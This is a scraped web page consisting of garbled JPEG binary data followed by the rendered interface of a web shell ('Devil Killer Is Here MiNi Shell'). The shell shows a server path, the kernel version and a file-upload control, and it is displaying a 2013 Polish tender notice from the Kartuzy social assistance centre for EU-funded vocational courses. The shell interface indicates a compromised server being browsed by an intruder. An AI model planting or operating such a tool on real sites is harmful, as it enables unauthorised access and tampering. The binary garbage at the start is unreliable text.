JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130510/71707-N-2013.html

<p class="kh_header"><b>Kartuzy: Organizacja i przeprowadzenie kursów zawodowych w ramach Projektu /Daj szansę-pomóż sobie i innym/ współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007 - 2013, Działanie 7.1 Poddziałanie 7.1.1.</b><br>
<b>Numer ogłoszenia: 71707 - 2013; data zamieszczenia: 10.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Hallera 1, 83-300 Kartuzy, woj. pomorskie, tel. 058 6812631, faks 058 6812631.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gops.kartuzy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Administracja samorządowa - Gminny Ośrodek Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie kursów zawodowych w ramach Projektu /Daj szansę-pomóż sobie i innym/ współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007 - 2013, Działanie 7.1 Poddziałanie 7.1.1..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający dopuszcza składanie ofert częściowych, gdzie część stanowi każde z wymienionych zadań w ZAŁĄCZNIKU I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających w wysokości do 50% przedmiotu zamówienia dla każdego z zadań. W przypadku zmian w ramach budżetu projektu /Daj Szansę- pomóż sobie i innym/, po wyrażeniu zgody przez Instytucję Pośredniczącą oraz w przypadku zainteresowania ze strony potencjalnych uczestników projektu, istnieje możliwość zwiększenia liczby osób objętych danym szkoleniem.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0, 80.53.31.00-0, 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.06.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY W NINIEJSZYM POSTĘPOWANIU NIE ŻĄDA WNIESIENIA WADIUM</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana, na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana, na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana, na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana, na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana, na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz Ofertowy - wypełniony i podpisany przez wykonawcę. 2. Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (jeżeli dotyczy). 3 Parafowany lub podpisany wzór umowy jako akceptacja jej treści i warunków. 4. Propozycję programu kursu, wraz ze wskazaniem ilości godzin przeznaczonych na poszczególne zagadnienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega możliwość wprowadzenia istotnych zmian postanowień zawartej umowy. W szczególności postanowienia umowy mogą ulec zmianie w następującym zakresie oraz na następujących warunkach:
1) warunki oraz termin płatności, w przypadku konieczności uwzględnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy o udzielenie zamówienia publicznego,
2) sposób wykonania przedmiotu zamówienia, w szczególności gdy zmiana sposobu realizacji zamówienia wynika ze zmian w obowiązujących przepisach prawa bądź wytycznych mających wpływ na wykonanie zamówienia,
3) ograniczenie zakresu usług objętych zamówieniem, w przypadku zaistnienia okoliczności, w których zbędne będzie wykonanie danej części zamówienia wraz ze związanym z tym obniżeniem wynagrodzenia,
4) termin wykonania przedmiotu zamówienia w przypadku pojawienia się przeszkody w jego wykonaniu w przewidzianym terminie, w przypadku konieczności uwzględnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy o udzielenie zamówienia publicznego lub w przypadku możliwości wprowadzenia korzystnych dla Zamawiającego rozwiązań, które w szczególności pozwolą skrócić okres realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.gops.kartuzy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej, ul. Hallera 1, 83-300 Kartuzy, pok. 307.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2013 godzina 12:00, miejsce: Gminny Ośrodek Pomocy Społecznej, ul. Hallera 1, 83-300 Kartuzy, pok. 307.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest związany z realizacji projektu /Daj szansę- pomóż sobie i innym/ (zwanego dalej Projektem), współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007 - 2013, Działanie 7.1 Poddziałanie 7.1.1...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs prawa jazdy kat. B..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a ) Cel kursu:

W ramach usługi, Wykonawca zobowiązany jest do przeprowadzenia dla 8 osób szkolenia teoretycznego i praktycznego określonego w Rozporządzeniu Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierującymi pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005 r. Nr 217, poz. 1834 ze zm.; Dz. U. z 2005 r. Nr 3, poz. 24 z późń. zm.). 

W podanej ofercie należy uwzględnić w szczególności: 
a) koszt wykładowców, sal szkoleniowych, placu manewrowego, 
b) koszt przystąpienia uczestnika do egzaminu wewnętrznego i zewnętrznego, w tym koszty pierwszego egzaminu praktycznego i teoretycznego,
c) materiały szkoleniowe dla uczestników posiadające podane przez Zamawiającego logotypy projektu, 
d) wydanie zaświadczeń o ukończeniu kursu na drukach zawierających podane przez Zamawiającego logotypy projektu, 
e) prowadzenie dokumentacji na drukach zawierających podane przez Zamawiającego logo projektu tj.: listy obecności, programy szkolenia, harmonogram szkolenia, ankiety oceniające szkolenie,
f) koszt badań lekarskich, 
g) koszt dowozu i odwozu uczestników kursu z i do miejsca zamieszkania na zajęcia praktyczne
g) wszelkie pozostałe koszty związane z przeprowadzeniem kursu. 

Wykonawca przeprowadzi szkolenie praktyczne z wykorzystaniem pojazdów, które są dopuszczone do ruchu, są przystosowane do nauki jazdy, spełniają wymagania określone w przepisach w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia w zakresie Prawa jazdy kategorii B. 

Zamawiający zastrzega sobie prawo do zmniejszenia w trakcie realizacji umowy liczby osób objętych szkoleniem. W takim przypadku Wykonawcy będzie przysługiwać tylko wynagrodzenie za faktycznie przeszkoloną liczbę osób i nie będzie on zgłaszać roszczeń co do realizacji pozostałej części. 

Wykonawca musi zapewnić uczestnikom kursu odpowiednie warunki lokalowe oraz organizacyjno - techniczne, w tym: 
a) wymagane jest, aby Wykonawca dysponował salami szkoleniowymi wyposażonymi w zestaw pomocy dydaktycznych. Wykonawca jest zobowiązany do zapewnienia uczestnikom szkolenia odpowiednich warunków w miejscu szkolenia, zgodnie z obowiązującymi przepisami bezpieczeństwa i higieny pracy, zapewnienia samodzielnych stanowisk szkoleniowych zawierających treści przedmiotowo związane z kategorią prawa jazdy, 
b) uczestnik szkolenia musi zostać wyposażony w bezzwrotne materiały dydaktyczne w terminie właściwym do prawidłowego przebiegu nauki, 
c) wykonawca powinien posiadać ubezpieczone pojazdy szkoleniowe, 
d) kadra musi się składać z osób, posiadających przygotowanie, doświadczenie i odpowiednie uprawnienia w prowadzeniu szkoleń o tematyce związanej z przedmiotem zamówienia w postaci przeprowadzonych kursów. 

Ukończenie szkolenia musi być potwierdzone stosownym zaświadczeniem, zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 27.10. 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005 r. Nr 217, poz. 1834 ze zmianami).

b ) Organizacja kursu:

Kursy  zostaną przeprowadzone dla 8 osób, w terminie od 01 czerwca do 31 sierpnia 2013 r., szczegółowo uzgodnionym z Zamawiającym. Miejsce przeprowadzenia szkolenia: miasto Kartuzy. Dopuszcza się możliwość, aby usługa szkoleniowa była realizowana poza terenem miasta Kartuzy, przy czym dojazd uczestników szkolenia w takim przypadku zapewnia Wykonawca na własny koszt. W takim przypadku, czas dojazdu uczestnika z miasta Kartuzy do miejsca realizacji zadania, za pomocą środków komunikacji, nie może być dłuższy niż 90 minut. Zajęcia teoretyczne muszą się odbywać w salach szkół nauki jazdy, które znajdują się pod adresem wskazanym w zaświadczeniu o wpisaniu do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców wydanym na podstawie ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs komputerowy z obsługą kas fiskalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest zapoznanie uczestników z konfiguracją i zarządzaniem systemem Windows, konfiguracją i instalacją urządzeń peryferyjnych (drukarka, skaner, czytniki pamięci), edytorem tekstu Word, prezentacjami multimedialnymi w PowerPoint, korzystanie z zasobów sieci Internet, poczta elektroniczna itp., Kurs  powinien trwać minimum 60 h w tym zajęcia teoretyczne 10 godzin, praktyczne 40h w tym- /minimum 20 godzin w sieci Internet/ oraz obsługa kasy fiskalnej w ilości 10h. 
	
		a) Organizacja kursu

Kurs przeprowadzony zostanie dla grupy liczącej 10 osób. Termin realizacji od 15 czerwca 2013 do 31 sierpnia 2013r.   termin zostanie szczegółowo uzgodniony z Zamawiającym. Miejsce realizacji kursu zapewnia Zamawiający - Kartuzy ul. Gdańska 10c. Ilość godzin: 60. 

b) Realizacja kursu

Wykonawca zobowiązany jest do zapewnienia uczestnikom kursu sprzętu technicznego na czas jego trwania komputerów i kas fiskalnych oraz do wyposażenia uczestników szkolenia w materiały szkoleniowe i dydaktyczne niezbędne do przeprowadzania kursu, w formie drukowanej i elektronicznej. Ponadto Wykonawca zapewni uczestnikom kursu materiały dydaktyczne na własność: pendrive, segregator, notatnik, długopis i materiały szkoleniowe drukowane z programem kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Kwalifikacje i doświadczenie osób bezpośrednio realizujących kurs - 40</li>
<li>3. Proponowany program - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs opieki nad osobą zależną..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Cel kursu

Celem kursu jest zapoznanie uczestników z zasadami opieki.
Program kursu powinien zawierać tematy z zakresu:
- zaspokajania podstawowych, codziennych potrzeb życiowych (tj. zakupy, gotowanie - lub dostarczanie gotowego posiłku, pranie, sprzątanie mieszkania) 
- opiece higienicznej (tj. zmiana bielizny pościelowej i osobistej, zmiana pieluchomajtek , toaleta w łóżku) 
- zleconej przez lekarza pielęgnacji ( tj. podawanie leków, zmiana pozycji osoby leżącej) , zapewnieniu kontaktów z otoczeniem 
-  w szczególnie uzasadnionych przypadkach zmiana opatrunków

b)	Organizacja kursu

Kurs dla 3 osób, przeprowadzony w terminie 15 czerwca 2013 do 31 sierpnia 2013 r. - termin zostanie szczegółowo uzgodniony z Zamawiającym. Miejsce realizacji zajęcia teoretyczne:  zapewnia Zamawiający - Kartuzy ul. Gdańska 10c., miejsce zajęć praktycznych zapewnia Wykonawca przy czym dojazd uczestników szkolenia w takim przypadku zapewnia Wykonawca na własny koszt. W takim przypadku, czas dojazdu uczestnika z miasta Kartuzy do miejsca realizacji zadania, za pomocą środków komunikacji, nie może być dłuższy niż 90 minut.  Kurs  powinien trwać minimum 50 h w tym 10h teoretycznych i 40h praktycznych..
Wykonawca jest zobowiązany do wyposażenia kursantów w materiały niezbędne do realizacji kursu.
Uczestnik musi otrzymać niezbędne materiały dydaktyczno-szkoleniowe na własność takie jak: notes, długopis, podręcznik tematyczny, fartuch, obuwie robocze, rękawiczki oraz aktualna książeczka zdrowia co należy udokumentować protokołem odbioru. 
Wykonawca zobowiązany jest do sporządzania, prowadzenia oraz przekazywania Zamawiającemu w terminie 7 dnia po zakończeniu kursu ostatniego uczestnika:
- oryginału list obecności z wykazem obecności na wszystkich zajęciach teoretycznych i praktycznych,
- imiennego wykazu osób, które ukończyły kurs,
- imiennego wykazu osób, które nie ukończyły kursu,
- zaświadczenie ukończenia kursu,
-potwierdzenie odbioru materiałów dydaktycznych i szkoleniowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Kwalifikacje i doświadczenie osób bezpośrednio realizujących kurs - 40</li>
<li>3. Proponowany program - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs języka angielskiego dla średniozaawansowanych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Cel kursu

Celem kursu jest rozszerzenie znajomości języka angielskiego uczestników projektu.

b)	Organizacja kursu

Kurs dla 4 osób, przeprowadzony w terminie 15 czerwca 2013 do 31 sierpnia 2013r. - termin zostanie szczegółowo uzgodniony z Zamawiającym. Miejsce realizacji zajęć:  zapewnia Zamawiający - Kartuzy ul. Gdańska 10c.,  Kurs  powinien trwać minimum 100 h.
Wykonawca jest zobowiązany do wyposażenia kursantów w materiały niezbędne do realizacji kursu.
Uczestnik musi otrzymać niezbędne materiały dydaktyczno-szkoleniowe na własność takie jak: notes, długopis, podręcznik tematyczny i ćwiczenia, słownik języka angielskiego w wersji papierowej co należy udokumentować protokołem odbioru. 

Wykonawca zobowiązany jest do sporządzania, prowadzenia oraz przekazywania Zamawiającemu w terminie 7 dnia po zakończeniu kursu ostatniego uczestnika.
- oryginału list obecności z wykazem obecności na wszystkich zajęciach teoretycznych i praktycznych,
- imiennego wykazu osób, które ukończyły kurs,
- imiennego wykazu osób, które nie ukończyły kursu,
- zaświadczenie ukończenia kursu,
-potwierdzenie odbioru materiałów dydaktycznych i szkoleniowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Kwalifikacje i doświadczenie osób bezpośrednio realizujących kurs - 40</li>
<li>3. Proponowany program - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs języka niemieckiego dla zaawansowanych.</p>
